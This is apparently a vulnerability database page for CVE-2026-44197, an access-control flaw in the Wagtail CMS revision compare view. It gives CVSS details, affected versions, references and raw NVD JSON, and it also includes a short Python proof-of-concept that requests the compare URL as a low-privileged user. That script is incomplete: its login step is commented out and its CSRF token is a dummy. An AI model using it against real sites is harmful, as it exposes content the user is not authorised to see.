CVE-2026-44197

Description

Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user without the ability to edit a page could access revisions of the page through the revision compare view if they knew the primary key of two revisions. This could potentially result in disclosure of sensitive information. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* - VULNERABLE

Wagtail < 7.0.7

Wagtail >= 7.1, < 7.3.2

Wagtail 7.4 之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://example.com"
username = "low_priv_user"
password = "user_password"
page_id = "1"  # Target Page ID
rev_id_1 = "10" # Known Revision PK 1
rev_id_2 = "11" # Known Revision PK 2

session = requests.Session()

# 1. Login to get session cookie
login_payload = {
    'username': username,
    'password': password,
    'csrfmiddlewaretoken': 'dummy_token' # Needs to be fetched in real scenario
}
# session.post(f"{target_url}/admin/login/", data=login_payload)

# 2. Exploit the vulnerability
# The URL structure for comparing revisions in Wagtail
exploit_url = f"{target_url}/admin/pages/{page_id}/revisions/compare/{rev_id_1}/{rev_id_2}/"

response = session.get(exploit_url)

if response.status_code == 200:
    print("[+] Success! Sensitive information retrieved from revision compare view.")
    print(response.text)
else:
    print("[-] Failed to access the view.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44197
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44197
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44197/
[4] VulDB https://vuldb.com/cve/CVE-2026-44197
[5] https://github.com/wagtail/wagtail/security/advisories/GHSA-c6wj-9vcj-75pj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44197", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:34.823", "lastModified": "2026-05-12T15:58:58.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user without the ability to edit a page could access revisions of the page through the revision compare view if they knew the primary key of two revisions. This could potentially result in disclosure of sensitive information. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-280"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.7", "matchCriteriaId": "AA54A323-7F77-4D1D-9830-BF8FBE4B5B34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1", "versionEndExcluding": "7.3.2", "matchCriteriaId": "FED1A6D7-1193-485D-B25F-60FCC20A6D6B"}]}]}], "references": [{"url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-c6wj-9vcj-75pj", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}